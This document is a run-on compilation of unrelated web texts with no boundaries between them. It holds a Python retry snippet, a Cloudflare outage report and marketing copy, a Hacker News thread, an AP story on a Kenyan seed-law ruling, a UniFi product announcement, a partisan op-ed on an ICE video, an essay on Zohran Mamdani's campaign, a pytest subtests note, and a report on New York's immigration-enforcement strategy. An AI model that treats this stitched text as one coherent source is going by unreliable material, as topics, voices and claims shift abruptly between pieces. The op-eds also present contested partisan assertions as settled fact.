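def fetch_with_retry(url: str, attempts: int = 3, backoff: float = 2.0) -> requests.Response:
    """Retry on 5xx responses, since those indicate a server-side fault."""
    for attempt in range(attempts):
        resp = requests.get(url, timeout=10)
        if resp.status_code < 500:
            return resp  # success, or a 4xx client error worth surfacing as-is
        time.sleep(backoff * (attempt + 1))  # server fault: wait, then try again
    return resp  # still failing after all attempts

# fetch_with_retry("https://example.com/")
```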
In an update to its status page, Cloudflare says it's investigating issues with Cloudflare Dashboard and related APIs.
"Customers using the Dashboard / Cloudflare APIs are impacted as requests might fail and/or errors may be displayed," the company noted.
Cloudflare says it has implemented a fix, and websites should start coming back online soon.
This is a developing story…
KISUMU, Kenya (AP) — A high court in Kenya on Thursday declared unconstitutional sections of a seed law that prevented farmers from sharing and selling indigenous seeds in what food campaigners have called a landmark win for food security.
Farmers in Kenya could face up to two years’ imprisonment and a fine of 1 million Kenya shillings ($7,700) for sharing seeds through their community seed banks, according to a seed law signed in 2012.
Justice Rhoda Rutto on Thursday said sections of the seed law that gave government officials powers to raid seed banks and seize seeds were also unconstitutional.
The law was introduced as a measure to curb the growing sale of counterfeit seeds, which was causing losses in the agricultural sector, and it gave sole seed trading rights to licensed companies.
The case had been filed by 15 smallholder farmers, who are members of community seed banks that have been in operation for years, preserving and sharing seeds among colleagues.
A farmer, Samuel Wathome, who was among the 15, said the old farming practices had been vindicated.
“My grandmother saved seeds, and today the court has said I can do the same for my grandchildren without fear of the police or of prison,” he said.
Elizabeth Atieno, a food campaigner at Greenpeace Africa, called the win a “victory for our culture, our resilience, and our future.”
“By validating indigenous seeds, the court has struck a blow against the corporate capture of our food system. We can finally say that in Kenya, feeding your community with climate-resilient, locally adapted seeds is no longer a crime,” she said.
Food campaigners have in the past encouraged governments to work with farmers to preserve indigenous seeds as a way of ensuring food security by offering farmers more plant varieties.
Indigenous seeds are believed to be drought resistant and adaptable to the climate conditions of their native areas, and hence often outperform hybrid seeds.
Kenya has a national seed bank based near the capital Nairobi where indigenous seeds are stored in cold rooms, but farmers say community seed banks are equally important for variety and proximity to the farmer.
The country has faced challenges in the seed sector where counterfeit seeds were sold to farmers, leading to losses amounting to millions of shillings in a country that relies on rain-fed agriculture.
Over 60 cloud services on one unified platform, uniquely powered by a global cloud network. We call it the connectivity cloud.
Modernize your network and secure your workspace against unauthorized access, web browsing attacks and phishing. Accelerate your journey to Zero Trust with our SASE platform today.
Use our industry-leading WAF, DDoS, and bot protection to protect your websites, apps, APIs, and AI workloads while accelerating performance with our ultra-fast CDN. Get started in 5 minutes.
Agents are the future of AI, and Cloudflare is the best place to get started. Use our agents framework and orchestration tools to run the models you choose and deliver new agents quickly. Build, deploy, and secure access for remote MCP servers so agents can access the features of your apps.
Only Cloudflare offers an intelligent, global cloud network built from the ground up for security, speed, and reliability.
60+ cloud services available globally
234B cyber threats blocked each day
20% of all websites are protected by Cloudflare
330+ cities in 125+ countries, including mainland China
Stop bot attacks in real time by harnessing data from millions of websites protected by Cloudflare.
Build serverless applications and deploy instantly across the globe for speed, reliability, and scale.
Get easy, instant access to Cloudflare security and performance services.
Get a personalized product recommendation for your specific needs.
Have questions or want to get a demo? Get in touch with one of our experts.
Is Cloudflare Down Again? Also, DownDetector/Claude.ai/LinkedIn?
18 points by dfasoro 30 minutes ago | 4 comments
I was writing a blogpost on Medium and I noticed errors, tried to open LinkedIn? down. tried downdetector? down. Claude.ai is also down
JoeWiltshire 20 minutes ago: https://downdetectorsdowndetectorsdowndetectorsdowndetector.... reports that https://downdetectorsdowndetectorsdowndetector.com/ is down, guessing downdetectorsdowndetectorsdowndetector runs via cloudflare!
yellowbanana 19 minutes ago: This is art
ablation 18 minutes ago: Already being discussed here: https://news.ycombinator.com/item?id=46158191
Jsmith4523 9 minutes ago: You know what, maybe AI is taking all the goddamn jobs
immibis 0 minutes ago: They pretty much said this. All the big companies that had recent outages are companies that publicly embraced vibe coding.
jakewins 21 minutes ago: Incident link at cloudflare: https://www.cloudflarestatus.com/incidents/lfrm31y6sw9q
ericcurtin 22 minutes ago: Time to use some local ai with Docker Model Runner :) No cloudflare no problem
pyuser583 16 minutes ago: I assume this is why Claude stopped working
lionkor 3 minutes ago: There are other LLMs you can ask to be absolutely, 100% sure.
PascalStehling 28 minutes ago: downdetectors downdetector shows that downdector should not be down. Something is wrong here.
Vivianfromtheo 19 minutes ago: Crunchyroll down too got me and the anime community stressed
B4n4n4 26 minutes ago: LinkedIn down
Folyd 27 minutes ago: i can confirm it down again
pappya_coder 25 minutes ago: Yes
RockRobotRock 31 minutes ago: jesus fucking christ i just wanna play runescape
JimmaDaRustla 19 minutes ago: This made getting paged at 4am worth it
4 December 2025
The UniFi 5G Max lineup was created with a clear goal in mind: deliver a sleek, versatile, and exceptionally powerful 5G internet experience that works effortlessly in any environment.
The UniFi 5G Max makes deployment easy, whether installed locally or at a remote site. Plug it into any PoE port and it instantly appears as a ready-to-use WAN interface, whether it’s connected directly to your UniFi gateway or to your office switch. No new cable runs needed! It sits neatly on a desk, but you can reposition it for the best possible signal using the included wall or window mount.
A compact form factor designed for fast installation and flexible placement at the core or edge.
The 5G Max delivers downlink speeds up to 2 Gbps with ultra low latency that makes it reliable as a primary connection and seamless as a backup WAN. UniFi routing policies and SLAs let you choose exactly how and when 5G is used, and for which clients and VLANs. Easily set per-SIM usage limits to avoid overage costs with just a few clicks.
High speed 5G that adapts to your network's rules, not the other way around.
For tougher environments or deployments with poor indoor cellular coverage, the outdoor model maintains the same high-performance cellular connectivity with improved antenna performance in a durable IP67-rated enclosure. It is built for rooftop installs, off-site locations, and mobile deployments where reliability is critical. Just like its indoor counterpart, you can also connect it via any PoE port, anywhere on your network, greatly simplifying cabling requirements.
A weatherproof 5G device built for reliability wherever you place it.
If you want everything UniFi in one device, the DreamRouter 5G Max combines 5G connectivity with WiFi 7, local storage, and full UniFi OS application support. Deploy it anywhere 5G is available and run an entire high-performance and scalable network stack instantly.
A complete UniFi system powered by the reach and speed of 5G.
Every device in the UniFi 5G lineup supports both physical SIMs and eSIM, giving you the freedom to choose your carrier and switch whenever needed with zero friction. All are equipped with dual SIM slots, with one SIM replaceable by eSIM, and are fully unlocked: any major carrier, any type of deployment, with one piece of hardware.
Carrier freedom built directly into the hardware from day 1.
The UniFi 5G lineup brings sleek design, powerful performance, easy installation, and genuine WAN flexibility to every deployment.
The Trump White House just showed us something every American should find chilling, no matter what music they listen to or what party they vote for.
They took a video of aggressive ICE arrests, slapped Sabrina Carpenter’s song on top of it, and posted it like it was a victory lap. Then, when Carpenter objected and said the video was “evil and disgusting” and told them not to use her music to benefit an “inhumane agenda,” the White House hit back with a statement that sounded like it came from a playground bully, not the seat of American government.
They didn’t debate her point. They didn’t defend policy with facts. They went straight to dehumanization and insult, calling people “illegal murderers, rapists, and pedophiles,” and saying anyone who defends them must be “stupid” or “slow.”
That’s not just ugly: it’s a warning.
Because the biggest story here is not a celebrity clapback; it’s that the White House is using the power of the state to turn human beings into a violence-normalizing punchline, and using America’s culture as a weapon to spread it.
This is what rising authoritarianism looks like in the age of social media.
A democracy survives on shared reality and shared humanity. It survives when the government understands that it works for the people and must be accountable to the Constitution, to due process, and to basic human decency.
But what happens when a government starts producing propaganda like it’s a teenage streamer chasing clicks and the president runs the White House like it’s a reality show operation, right down to the televised Cabinet meetings?
We get a machine that can normalize cruelty. We get a public trained to cheer at humiliation. We get outrage as entertainment. And we get the steady erosion of our ability to ask the most important questions in a free society.
Was this legal? Was it justified? Was it proportional? Was it humane? Were innocent people caught up? Were families separated? Was there due process? Is it even constitutional?
Those questions disappear when the government turns an ICE arrest into a meme.
There are, of course, serious crimes in every society and violent criminals should be held accountable under the law. But that isn’t what the White House statement was doing. It was, instead, engaged in something far more ancient, cynical, and dangerous.
It was trying to paint everyone in that video with the worst label imaginable so the public stops caring about what happens next.
That’s how they get permission — both explicit and implicit — for abuses.
If the audience for Trump’s sick reality show is told, “These are monsters,” then — as we’ve most recently seen both with ICE here domestically and with people in small boats off the coast of Venezuela — any cruelty becomes acceptable.
Any killing becomes a shrug. Overreach becomes a punchline. And following the rule of law becomes something we apply to our friends while we throw it away for people we have been taught to hate.
That is exactly why authoritarians always start by dehumanizing a target group.
And it always spreads.
Trump started by demonizing and then going after immigrants. Then he demanded fealty (and millions of dollars) from journalists, universities, and news organizations. He demonizes his political opponents to the point they suffer death threats, attacks, and assassinations. And if Trump keeps going down this same path — as Pastor Niemöller famously warned the world — it’ll next be you and me.
Consider this regime’s cultural warfare program. The White House has reportedly used music from multiple artists without permission and now brags that they’ve used those creators’ work to bait outrage, to “own the libs.”
All to drive attention, create spectacle, and turn governance into a constant fight as they punish anyone in public life — today it’s Sabrina Carpenter — who dares to speak up.
This is intimidation pretending to be a joke. If you’re an artist, a teacher, an organizer, or just a person with a platform, the message is simple: “We can drag you into our propaganda machine whenever we want, and if you object we’ll mock you and send an online — and often physical — mob after you.”
That’s a chilling reality, and it matters in a democracy. People start to think twice before speaking. They start to retreat. They start to self censor.
And that’s the Trump regime’s first goal.
Then there’s the distraction, particularly from a cratering economy and Trump’s association with Epstein and Maxwell.
With this strategy, borrowed from the Nazis (as my guest on the radio show Monday, Laurence Rees, noted in his book The Nazi Mind: 12 Warnings From History), culture war isn’t a sideshow anymore, it’s part of a larger strategy.
When the government posts a meme like the one where ICE used Carpenter’s music, it isn’t trying to inform us: it’s trying to trigger us. It’s trying to bait us into amplifying the clip, fighting over the celebrity angle, and losing sight of the real issue.
And that real issue is Trump’s and the GOP’s insatiable lust for state power and the wealth that power can allow, bring, and protect.
Armed agents. Detention. Deportation. Families. Fear. Mistakes that can’t be undone. Human beings who can be disappeared from their communities with the tap of a button and a viral soundtrack. Or killed by “suicide” in a jail cell when they threaten to go public.
If we care about freedom, we can’t just stand by and say nothing while this regime turns ICE’s violence into content.
Because once a government learns it can win political points by broadcasting humiliation, it’ll do it again. And it’ll escalate. It’ll push the line farther and farther until we wake up one day and wonder how we got here.
So what do we do?
First, stop amplifying their propaganda on their terms. Don’t share their clips as entertainment, even to condemn them, without adding context (there are no links in this article). When you must talk about it, talk about the power being abused, not the celebrity drama.
Second, demand oversight. Call your members of Congress (202-224-3121). Demand hearings on ICE media practices and the use of official government accounts and our tax dollars to promote dehumanizing propaganda. Demand transparency on how these videos are produced, approved, and distributed.
Third, support civil liberties groups and immigrant rights organizations that challenge abuses in court and document what’s happening on the ground. Democracy requires watchdogs like them when the people in power act like they’re above the law.
Fourth, get inside the Democratic Party and vote — and help others vote — like it matters, because it does. Local prosecutors, sheriffs, governors, attorneys general, and members of Congress all shape how far this culture of cruelty can spread. Authoritarians rely on fatigue and cynicism. Don’t give them either: participate.
And finally, speak up. Sabrina Carpenter did, and she was right to. Not because she’s a pop star, but because she named the moral truth that the White House is trying to smother with what they pretend are jokes.
When a government starts celebrating the humiliation of vulnerable people, it’s telling the world that it no longer sees itself as the servant of a democratic republic. Of all the people. Instead, it now sees itself as the applause-hungry enforcer of a bloodthirsty tribe.
If we let this become normal, we will — one day soon — no longer recognize our country.
This is the moment to draw a line.
Not just for immigrants. Not just for artists. For the Constitution. For due process. For human dignity. For the idea that in America, power is accountable.
Call. Organize. Vote. Let’s not let cruelty become America’s official language.
The Hidden History of Monopolies: How Big Business Destroyed the American Dream" (2020); "The Hidden History of the Supreme Court and the Betrayal of America" (2019); and more than 25 other books in print.]
When was the last time being on the left was fun? Even in the best of times, supporting socialism in America can feel like performing a grim duty in the face of almost certain disappointment. The chapter titles in Burnout , Hannah Proctor’s investigation of the emotional landscapes of leftist militancy, are revealing: Melancholia, Nostalgia, Depression, Burnout, Exhaustion, Bitterness, Trauma, Mourning. One of the many virtues of Zohran Mamdani’s remarkable campaign for New York City mayor was that it never felt this way, not even when he was sitting near the bottom of the polls. It was a year-long act of collective joy. Real joy—not the brief sugar high that surged when Kamala Harris replaced Joe Biden at the top of the Democrats’ 2024 ticket. Volunteering for Mamdani never felt like a chore, even when the weather was bad and fewer canvassers showed up for their shift than expected. It was a blast from start to finish, and we didn’t even have to console ourselves with a moral victory. This time, we actually won.
We tend to speak of voting as a civic duty, and of boosting voter participation as a high-minded, “good government” concern. The nature of mass politics, however, has often been anything but staid and responsible. Michael McGerr begins his book The Decline of Popular Politics with a colorful account of a Democratic Party “flag raising” in New Haven in 1876. It was a raucous affair, complete with torchlight parades, street corner speeches, brass bands, fireworks, and rivers of booze courtesy of local party notables. Political spectacle hasn’t gone away, but since the advent of modern communications technology it has become enormously mediated. By contrast, historian Richard Bensel has described the “sheer physicality of voting” and party politics in the nineteenth century. People flocked to the polls, Bensel writes, “simply because they were exciting, richly endowed with ethno-cultural themes of identity, manhood, and mutual recognition of community standing.” It was party politics, in both senses of the word.
This era should not be romanticized. Aside from the fact that only men could vote, the atmosphere of drink-soddened masculinity that pervaded election campaigns kept most women away even when it did not descend into partisan and racial violence. Even so, it is hard not to agree with political scientists Daniel Schlozman and Sam Rosenfeld that America’s early mass parties “bequeathed a genuinely popular and participatory” culture whose “promise still haunts American politics.”
Much has been made of Mamdani’s extremely effective use of social media, short-form video, and other digital formats that speak to the younger and disengaged voters many other campaigns struggle to reach. There’s no doubt this was a major ingredient in the campaign’s success; historically high rates of participation among Gen Z and newly registered voters testify to its effectiveness. But the sheer physicality of the Mamdani campaign, and the ways it used digital media to bring people together offline, has been underrated.
Consider the citywide scavenger hunt in August. A call went out over social media on a Saturday night, and thousands of people showed up the next morning to race around seven stops across the boroughs, each one connected to the city’s history. Disgraced incumbent mayor Eric Adams denounced the frivolity: “I’m sure a scavenger hunt was fun for the people with nothing better to do. . . . Mamdani is trying to turn our city into the Squid Games.” One competitor offered a different perspective: “I think actually trying to have fun in politics and do a little bit of a community building exercise, a way to actually learn about our city—I’ve never known another politician to do it.”
The scavenger hunt was just one example of the campaign’s popular and participatory culture. So much of the campaign was in public and in person: mass rallies, a walk through the entire length of Manhattan, unannounced appearances at clubs and concerts, a 100,000-strong army of volunteers who braved countless walk-ups to knock over 1 million doors. From early spring through November’s general election, the campaign assumed the scale and spirit of a social movement, or a Knicks playoff run. There was a palpable buzz around the city—not just in what New York electoral data maven Michael Lange termed the “ Commie Corridor ” neighborhoods, populated by young college-educated leftists, but in Little Pakistan, Little Bangladesh, Parkchester, and other places where nary a New Yorker tote bag can be found.
When the polls closed, more than 2 million voters had cast their ballots, the highest turnout in a New York City mayoral election since 1969. More than 1 million voters, just over half the electorate, voted for Mamdani. At the same time, over 850,000 voted for Andrew Cuomo, who successfully consolidated many Republican voters behind his second-effort bid to return to public office. Another 146,000 voted for the official Republican candidate, the perennial also-ran Curtis Sliwa.
Mamdani’s shockingly decisive win in the Democratic primary had been powered by his core constituencies: younger voters, college-educated renters, and South Asian and Muslim voters, many of whom participated in the electoral process for the first time. He carried these constituencies with him into the general election, but he may have struggled to win the final contest without rallying large numbers of working-class Black and Hispanic voters too. As Lange has shown , the areas that shifted most strongly toward Mamdani from the primary to the general election were Black and Hispanic neighborhoods in the Bronx, Brooklyn, and Queens. Many Black and Hispanic voters under forty-five were already in Mamdani’s column in the primary, but his numbers then were far lower among their parents and grandparents. After securing the Democratic nomination, his campaign made inroads by building relationships with Black church congregations and community organizations, as well as labor unions with disproportionately Black and Hispanic memberships. By cobbling these disparate constituencies together in the general election, Lange concluded, Mamdani successfully renewed the promise of the Rainbow Coalition for the twenty-first century.
Explaining how Mamdani did this has become something of a Rorschach test for pundits. Much of the commentary has focused on his campaign’s affordability agenda, which targeted the city’s cost-of-living crisis through proposals for freezing rents, eliminating fares on city buses, and implementing universal child care, among others. While Mamdani’s emphasis on affordability was necessary for securing the victory, and his economic proposals were popular across his constituencies, he would not have been able to mobilize the coalition he did on the strength of bread-and-butter appeals alone. Mamdani’s unequivocal stances on “non-economic” questions like the genocide in Gaza or the ICE raids terrorizing immigrant communities built trust among precisely the people he needed to join his volunteer army or turn out to vote for the first time.
Support for Palestine dovetailed with Mamdani’s vocal opposition to the Trump administration’s assault on immigrants, which came together in an impromptu confrontation with Trump’s “border czar” Tom Homan last March. A video of the encounter , in which Mamdani challenged Homan over the illegal detention of Palestinian solidarity activist Mahmoud Khalil, circulated widely on social media and in immigrant communities. All of this helped Mamdani link his economic program with opposition to the president’s authoritarian lurch. In doing so, he appealed to immigrant voters worried about both ICE raids and making the rent, as well as voters who want their representatives to stand up to masked federal agents snatching people off the streets and whisking them away in unmarked cars. Moreover, Mamdani’s identity as a Muslim of South Asian descent undoubtedly activated demobilized voters excited by the idea of seeing someone like them in Gracie Mansion. The historic turnout surge that swept Muslim and South Asian neighborhoods in the outer boroughs is inseparable from Mamdani’s faith, his cultural fluency, and his outspoken defense of fellow Muslims against the Cuomo campaign’s Islamophobic bigotry.
The New York City chapter of the Democratic Socialists of America (NYC-DSA) has received a lot of credit for Mamdani’s victory, and rightfully so. Mamdani is a DSA member, as are his chief of staff, field director, and other key advisers. The campaign’s field leads, who organized canvassing shifts, were disproportionately members (I co-led a weekly canvass in my Brooklyn neighborhood during the primary). But organizations rooted in South Asian and Muslim communities deserve their fair share of the credit, including Desis Rising Up and Moving (DRUM) Beats, the Muslim Democratic Club of New York, Bangladeshi Americans for Political Progress, and grassroots affinity groups like Pakistanis for Zohran and Bangladeshis for Zohran. The mobilization of these communities transformed the electorate and helped Mamdani offset Cuomo’s strength in neighborhoods that shifted sharply to the former governor in the general election.
There are nearly 1 million Muslims in New York, but until Mamdani’s campaign they were a sleeping giant in local politics. Roughly 350,000 Muslims were registered, but only 12 percent of registered Muslims turned out to vote in the 2021 mayoral election. Mamdani’s campaign turned this dynamic completely on its head. DRUM Beats, which has organizing bases in the Bronx, Brooklyn, and Queens spanning a range of South Asian and Indo-Caribbean diasporic communities, played a key role. Their organizers are committed and tenacious, and many of them are women. “We’re like a gang,” the group’s organizing director Kazi Fouzia told a Politico reporter last summer. “When we go to any shop, people just move aside and say, ‘Oh my god. The DRUM leaders are here. The DRUM women are here.’” When Mamdani recognized “every New Yorker in Kensington and Midwood” in his victory speech, he had in mind the scores of aunties who ran themselves ragged knocking doors, sending texts, and making phone calls.
In their post-election analysis of the voting data, DRUM Beats detailed an enormous increase in turnout in the communities they organize. Based on Board of Elections data and their own models, they estimated that from 2021 to 2025 South Asian turnout exploded from 15.3 percent to nearly 43 percent, while Muslim turnout went from barely 15 percent to over 34 percent. While representing just 7 percent of New York’s registered voters, they accounted for an estimated 15 percent of actual voters in the general election. Nearly half of the city’s registered Bangladeshi and Pakistani American voters participated in the election, outpacing the overall participation rate of roughly 42 percent. This historic development didn’t materialize out of thin air. Mamdani’s faith, identity, and raw talent certainly didn’t hurt, but people on the ground have been quietly building civic infrastructure in these neighborhoods. In his assessment of the South Asian surge, electoral strategist Waleed Shahid noted that the places with the biggest gains were precisely “the places where DRUM Beats and allied organizers have spent years knocking doors, translating ballot measures, convening tenant meetings in basement prayer rooms, and building lists through WhatsApp groups and WhatsApp rumors alike.” I had the good fortune of getting to know some of these organizers during the campaign. Their capacity to mobilize working-class immigrants who had been overlooked for too long is formidable, and Mamdani’s victory cannot be explained without it.
Mamdani claimed the legacy of Fiorello La Guardia and Vito Marcantonio in the campaign’s final days, and the historical resonances ran deep. Shahid drew a parallel between the current moment and earlier realignments in the city’s political history “when groups written off as threatening or foreign became disciplined voting blocs: Irish Catholics moving from despised outsiders to Tammany’s core; Jewish and Italian workers turning the Lower East Side into a labor/socialist stronghold.” I am a product of New York’s twentieth-century Italian American diaspora myself. In rooms full of South Asian aunties for Zohran, wearing headscarves and plying everyone with plates of food, I saw people who in a different time could have been my own relatives stumping for the Little Flower, the legendary figure who was once told New York wasn’t ready for an Italian mayor. Turns out it was ready for an Italian mayor then, and it’s ready for a Muslim mayor now.
Donald Trump’s return to the presidency set off a war of white papers on Democratic Party electoral strategy that shows few signs of a ceasefire. There are a variety of strategic prescriptions, but many of them fall into two broad and infelicitously named camps: popularists and deliverists. Popularists tend to hail from the party’s moderate wing, but not always. There is a leftist variety of popularism, for example, that finds expression in projects like the Center for Working-Class Politics. Ezra Klein has offered perhaps the clearest definition of the popularist persuasion: “Democrats should do a lot of polling to figure out which of their views are popular and which are not popular, and then they should talk about the popular stuff and shut up about the unpopular stuff.” Deliverism, by contrast, focuses less on campaigning and more on governing. As Matt Stoller summarized it in a tweet: “deliver and it helps you win elections. Don’t deliver and you lose.” When Democrats are in power, they should implement bold policies that improve people’s lives and then reap the rewards from a satisfied electorate.
There is an element of “duh, of course” to both schools of thought, but the weaknesses are easy to spot. Popularism seeks to mirror the current state of public opinion for the sake of electoral success, but public opinion is malleable and sometimes quite fickle. One need only look at the wildly fluctuating data on immigration attitudes since the 2024 election to see how quickly chasing public opinion can become a fool’s errand. Deliverism, by contrast, presumes “a linear and direct relationship between economic policy and people’s political allegiances,” as Deepak Bhargava, Shahrzad Shams, and Harry Hanbury put it . But that’s not typically how real people operate. The Biden administration was, in many respects, an experiment in deliverism that failed to deliver. It implemented policies that brought tangible benefits to millions of people but still couldn’t prevent Trump from returning to the White House.
The limitations of both popularism and deliverism have opened space for a new school of thought, one that tackles strategic electoral questions from a different angle (but also has a terrible name): partyism. The political scientist Henry Farrell has usefully summarized its premises: the Democratic Party’s fundamental problem is not its ideological positioning but the fact that it’s not a political party in any real sense. “If Democrats want to succeed,” Farrell writes, they need to “build up the Democratic party as a coherent organization that connects leaders to ordinary people.” In their book The Hollow Parties , Daniel Schlozman and Sam Rosenfeld trace how the Democratic and Republican parties alike have been transformed into rival “blobs” of consultants, donors, strategists, and interest groups. Their critique has been influential, and it has informed a spate of proposals for turning the Democratic Party into a network of civic institutions that engages voters between elections and mediates effectively between leaders and the base.
The Mamdani campaign was arguably the first major test of the partyist approach in practice. While there is no indication that campaign leaders and strategists consciously appropriated these ideas, it is not difficult to see the affinities between them. The campaign brought new and disengaged voters into the fold through novel activities like the scavenger hunt and the Cost of Living Classic, a citywide soccer tournament held in Coney Island. Its sinew and muscle came not from TikTok or Instagram, but from rooted civic organizations like NYC-DSA, DRUM Beats, United Auto Workers Region 9A, and the mosques, synagogues, and churches that opened their doors to the candidate. Even four of the five Democratic Party county committees in the city endorsed him, despite their historic wariness of insurgent candidates from the democratic socialist left (only the Queens county committee, a stronghold of dead-end Cuomo supporters, snubbed him). Mamdani’s victory was based, to a significant extent, on organizations with real members who engage in meaningful civic and political activity.
Of all the organizations listed above, however, the least important by far are the official bodies of the Democratic Party. The Mamdani campaign may have embodied an emergent partyist politics, but this is a partyism without the party. NYC-DSA’s electoral strategy, for example, is grounded in the concept of the “party surrogate” first proposed by Jacobin ’s Seth Ackerman and developed further by the political scientist Adam Hilton and others. Given the daunting odds of successfully establishing any new party, Hilton proposes a network of chapter-based organizations “oriented toward building a base within working-class communities and labor unions that can also act as an effective independent pressure group on the Democratic Party.” This is precisely what Mamdani and other socialist candidates have done. Primary voters—not party organizations—decide candidate nominations, which radically reduces the incentives for transforming those organizations. Why fill in the hollow parties when you can do much the same thing outside of them?
For now, at least, partyist projects like the one that catapulted Mamdani into political stardom will continue to gestate outside of any formal party organization. The NYC-DSA chapter has doubled in size to 13,000 members since 2024, and that number will likely continue to grow. Organizers have established a new organization called Our Time that is focused on mobilizing campaign volunteers in support of Mamdani’s agenda after he is sworn into office. NYC-DSA, DRUM Beats, labor unions, tenant groups, and other organizations that endorsed Mamdani during the campaign have established a formal coalition called the People’s Majority Alliance to do much the same thing at the organizational leadership level. So it seems unlikely that Mamdani’s coalition will demobilize the way Barack Obama’s did after 2008. These are independent organizations, constituted outside of official Democratic Party institutions, that assume the base-building and mobilization functions a party would carry out directly in most other political systems. This is the form popular and participatory politics takes in the age of hollow parties, raising the possibility that a lost culture once sustained by precinct captains, ward heelers, and saloon keepers could be reborn in a new way.
Rolling back MAGA will require speaking to popular needs and aspirations and delivering on them. It will also require developing our capacities to work together in a spirit of democratic cooperation and public exuberance. The Mamdani campaign laid the foundations for this in one city, but here and elsewhere much more reconstruction remains to be done.
[ Chris Maisano is a trade unionist and Democratic Socialists of America activist. He lives in Brooklyn, New York.]
TIL: Subtests in pytest 9.0.0+. I spotted an interesting new feature in the release notes for pytest 9.0.0: subtests.
I'm a big user of the pytest.mark.parametrize decorator - see Documentation unit tests from 2018 - so I thought it would be interesting to try out subtests and see if they're a useful alternative.
Short version: this parameterized test:
@pytest.mark.parametrize("setting", app.SETTINGS)
def test_settings_are_documented(settings_headings, setting):
    assert setting.name in settings_headings
Becomes this using subtests instead:
def test_settings_are_documented(settings_headings, subtests):
    for setting in app.SETTINGS:
        with subtests.test(setting=setting.name):
            assert setting.name in settings_headings
Why is this better? Two reasons:
I had Claude Code port several tests to the new pattern. I like it.
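One thing subtests make easy that parametrize doesn't (a sketch of my own, not something from the pytest release notes): the cases can be computed at runtime inside the test body, with no collection-time machinery. The discover_doc_files() helper here is hypothetical.

import pathlib


def discover_doc_files(root):
    # Hypothetical helper: a real project would have its own discovery logic.
    return sorted(pathlib.Path(root).glob("docs/*.md"))


def test_docs_have_titles(subtests):
    # Cases are discovered at runtime; each file gets its own pass/fail report,
    # and a failure in one file doesn't stop the loop.
    for doc in discover_doc_files("."):
        with subtests.test(doc=doc.name):
            text = doc.read_text(encoding="utf-8")
            first_line = text.splitlines()[0] if text else ""
            assert first_line.startswith("# "), f"{doc} is missing a top-level title"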
Jackie Bray has been thinking about how quickly things could spiral out of control.
Bray is the New York state emergency leader whom Gov. Kathy Hochul tasked with averting a Chicago or Los Angeles-style surge of immigration agents and National Guard troops. At the core of the job is a dilemma that the Trump administration has imposed on blue cities and states around the country: How can the state respond to aggressive, spectacle-driven immigration operations without triggering the showdown with federal agents that the administration is trying to provoke?
It’s a problem made only more acute by how geared some of the operations have been toward gaining as much attention as possible, and by how far they have drifted away from immigration enforcement and toward repressing the protests that follow.
The result, state officials say, is a split approach. New York will fight to delay and block any federal deployment of the National Guard. But when it comes to surges of immigration enforcement officers, the plan is restraint: state and local police will act as buffers between federal agents and protestors, doing what they can to control crowds and de-escalate.
Glimpses of that strategy have already started to emerge. NYPD Commissioner Jessica Tisch reportedly got a heads-up about a high-profile October immigration raid on Manhattan’s Canal Street from the Trump administration; the Daily News reported that she directed officers to steer clear of the area. At a protest in late November, local police placed barricades between demonstrators and a group of Immigration and Customs Enforcement and Border Patrol officers who the activists had surrounded in a parking garage.
The approach has already led to criticism that the state is accommodating, and not fighting, what many regard as an increasingly harrowing example of authoritarianism. State officials respond that their approach is necessary to stop events from spiraling into the kind of escalation that could justify more federal deployments.
“I feel very lucky to not be an elected leader right now,” Bray told TPM.
Gov. Kathy Hochul (D) directed Bray, a political appointee serving as director of New York State Division of Homeland Security and Emergency Services, over the summer to work out a plan that would avert the kind of splashy, violent federal presence that overtook Chicago, Los Angeles, and other cities.
For prevention, one model stands out: San Francisco.
There, Silicon Valley executives, along with Mayor Daniel Lurie (D), pleaded with Trump. They argued that a deployment would damage the economy. He replied by calling it off: “Friends of mine who live in the area called last night to ask me not to go forward with the surge,” he wrote on Truth Social.
That’s the plan that New York officials are trying to implement. They’ve convened groups of Wall Street leaders (Bray declined to say whether any had spoken to White House officials); both Hochul and New York City mayor-elect Zohran Mamdani have spoken with Trump directly.
Those meetings have resulted in something less than an adversarial relationship. As Trump shepherded Mamdani through an Oval Office press conference last month, the mayor-elect emphasized areas where the city and federal government could work together.
There are other benefits that the state can provide Trump, whose family business is still deeply rooted in New York. This week, a state gambling board approved licenses for three proposed casinos: one of them is set to be built on a golf course that belonged to the President. The move will net the Trump Organization $115 million.
The deployments in Chicago and Los Angeles brought a level of brutality that, at first, helped to obscure their real aim.
The Trump administration cast them as immigration enforcement efforts, albeit with a new level of aggression. But after the White House used local, minor incidents of violence to justify sending troops in, the ICE and CBP operations started to strike observers as pretexts to stage larger-scale repression.
That prompted organizing between cities and states that had experienced the deployments and those that were next. New York’s Communications Workers of America organized one call in September titled “Learning From Chicago and LA and Preparing for Federal Escalation,” between elected officials in New York, Illinois, California, and elsewhere.
“We were just cautioning people to not lose the messaging war,” Hugo Martinez, a Los Angeles city councilmember on the call, told TPM. He said that the administration was seeking grounds to escalate, and that community leaders needed to “try to have as much control as possible over the response that the community has.”
Byron Sigcho-Lopez, a Chicago alderman, was on the call as well.
He took the message to heart. His community, Chicago’s Little Village, became an epicenter of CBP operations. One video that Sigcho-Lopez recorded of an October encounter with Gregory Bovino, the Border Patrol commander leading the Chicago operations, demonstrates how he internalized the approach: at several points, when demonstrators started to approach federal agents, Sigcho-Lopez would wave them off.
“They wanted to see escalation,” he told TPM last month.
Bray, the New York state commissioner, said that she had spoken to her counterparts in California and Illinois. For her, a few points became clear: litigation needed to start early. Local law enforcement needed to be prepared for the administration to direct federal authorities to stop communicating with them. Certain sites — like ICE detention facilities — became flashpoints.
The charm offensive has worked for now, state and city officials told TPM. But nobody can say how long that will last.
City officials are already taking some steps to prepare. The city sold a still-functional but out-of-use prison barge that was anchored near Rikers Island to a scrap company in Louisiana, removing 800 beds that the federal government could have seized for immigration enforcement. The city’s Economic Development Corporation, which is responsible for the project, declined to comment.
New York Attorney General Tish James’ office is preparing legal strategies and lawsuits to file that would challenge any National Guard deployment, one official told TPM.
Community organizers — some of whom have held calls with their counterparts in Chicago, LA, and elsewhere — are preparing as well.
They envision a campaign of resistance that will start with measures already in place, like flyers calling for people to report ICE and CBP operations. That information is then relayed to a network of people who can mobilize in response, organizing through messaging apps and staging spontaneous protests like one that appeared in Manhattan over the weekend and corralled federal agents for roughly two hours.
